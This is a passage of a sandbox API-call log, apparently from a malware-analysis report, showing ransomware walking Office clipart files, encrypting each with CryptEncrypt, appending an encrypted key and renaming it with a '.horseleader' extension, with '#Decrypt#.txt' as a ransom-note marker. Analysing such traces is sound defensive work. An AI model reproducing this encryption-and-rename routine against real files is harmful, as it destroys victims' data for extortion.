Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.595] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0252.595] StrStrW (lpFirst="AN00015_.WMF", lpSrch=".txt") returned 0x0 [0252.596] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4734) returned 1 [0252.596] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x127e, lpOverlapped=0x0) returned 1 [0252.598] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.598] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x127e, lpOverlapped=0x0) returned 1 [0252.599] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.599] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.599] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.599] CloseHandle (hObject=0x158) returned 1 [0252.599] GetProcessHeap () returned 0x780000 [0252.599] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.horseleader") returned 79 [0252.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.horseleader")) returned 1 [0252.600] GetProcessHeap () returned 0x780000 [0252.600] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.600] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e812b00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7e812b00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x1634, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00790_.WMF", cAlternateFileName="")) returned 1 [0252.600] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="Windows") returned -1 [0252.600] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0252.600] StrStrIW (lpFirst="AN00790_.WMF", lpSrch=".horseleader") returned 0x0 [0252.601] lstrcmpW (lpString1="AN00790_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.601] lstrcmpW (lpString1="AN00790_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.601] lstrlenW (lpString=".testttjffg") returned 11 [0252.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0252.602] StrStrW (lpFirst="AN00790_.WMF", lpSrch=".txt") returned 0x0 [0252.602] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5684) returned 1 [0252.602] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1634, lpOverlapped=0x0) returned 1 [0252.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe9cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1634, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1634, lpOverlapped=0x0) returned 1 [0252.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.605] CloseHandle 
(hObject=0x158) returned 1 [0252.605] GetProcessHeap () returned 0x780000 [0252.605] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.horseleader") returned 79 [0252.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.horseleader")) returned 1 [0252.606] GetProcessHeap () returned 0x780000 [0252.606] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.606] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9eb2200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9eb2200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5062, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00853_.WMF", cAlternateFileName="")) returned 1 [0252.607] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="Windows") returned -1 [0252.607] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0252.607] StrStrIW (lpFirst="AN00853_.WMF", lpSrch=".horseleader") returned 0x0 [0252.607] lstrcmpW (lpString1="AN00853_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.607] lstrcmpW (lpString1="AN00853_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.607] lstrlenW 
(lpString=".testttjffg") returned 11 [0252.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 67 [0252.608] StrStrW (lpFirst="AN00853_.WMF", lpSrch=".txt") returned 0x0 [0252.608] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20578) returned 1 [0252.608] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.611] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.611] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.611] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x62, 
lpOverlapped=0x0) returned 1 [0252.612] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x62, lpOverlapped=0x0) returned 1 [0252.612] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.612] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.612] CloseHandle (hObject=0x158) returned 1 [0252.612] GetProcessHeap () returned 0x780000 [0252.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.horseleader") returned 79 [0252.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.horseleader")) returned 1 [0252.614] GetProcessHeap () returned 0x780000 [0252.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 
[0252.614] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2efb2900, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2efb2900, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x2a50, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00914_.WMF", cAlternateFileName="")) returned 1 [0252.614] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="Windows") returned -1 [0252.614] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0252.614] StrStrIW (lpFirst="AN00914_.WMF", lpSrch=".horseleader") returned 0x0 [0252.614] lstrcmpW (lpString1="AN00914_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.614] lstrcmpW (lpString1="AN00914_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.614] lstrlenW (lpString=".testttjffg") returned 11 [0252.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.614] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.616] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 67 [0252.616] StrStrW (lpFirst="AN00914_.WMF", lpSrch=".txt") returned 0x0 [0252.616] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10832) returned 1 [0252.616] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2a50, lpOverlapped=0x0) returned 1 [0252.619] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd5b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2a50, lpOverlapped=0x0) returned 1 [0252.619] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.619] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.619] CloseHandle (hObject=0x158) returned 1 [0252.620] GetProcessHeap () returned 0x780000 [0252.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.620] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.horseleader") returned 79 [0252.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.horseleader")) returned 1 [0252.621] GetProcessHeap () returned 0x780000 [0252.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.621] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9f500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8b9f500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x385c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00932_.WMF", cAlternateFileName="")) returned 1 [0252.621] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="Windows") returned -1 [0252.621] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0252.621] StrStrIW (lpFirst="AN00932_.WMF", lpSrch=".horseleader") returned 0x0 [0252.621] lstrcmpW (lpString1="AN00932_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.621] lstrcmpW (lpString1="AN00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.621] lstrlenW (lpString=".testttjffg") returned 11 [0252.621] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.621] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.621] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 67 [0252.622] StrStrW (lpFirst="AN00932_.WMF", lpSrch=".txt") returned 0x0 [0252.622] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14428) returned 1 [0252.622] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x385c, lpOverlapped=0x0) returned 1 [0252.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc7a4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.690] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x385c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x385c, lpOverlapped=0x0) returned 1 [0252.690] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.690] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.691] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.691] CloseHandle (hObject=0x158) 
returned 1 [0252.691] GetProcessHeap () returned 0x780000 [0252.691] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.horseleader") returned 79 [0252.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.horseleader")) returned 1 [0252.693] GetProcessHeap () returned 0x780000 [0252.693] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.693] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc14efd00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc14efd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00965_.WMF", cAlternateFileName="")) returned 1 [0252.693] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="Windows") returned -1 [0252.693] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0252.693] StrStrIW (lpFirst="AN00965_.WMF", lpSrch=".horseleader") returned 0x0 [0252.693] lstrcmpW (lpString1="AN00965_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.693] lstrcmpW (lpString1="AN00965_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.693] lstrlenW (lpString=".testttjffg") 
returned 11 [0252.693] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 67 [0252.694] StrStrW (lpFirst="AN00965_.WMF", lpSrch=".txt") returned 0x0 [0252.694] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7072) returned 1 [0252.694] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0252.697] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.697] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0252.697] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.697] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, 
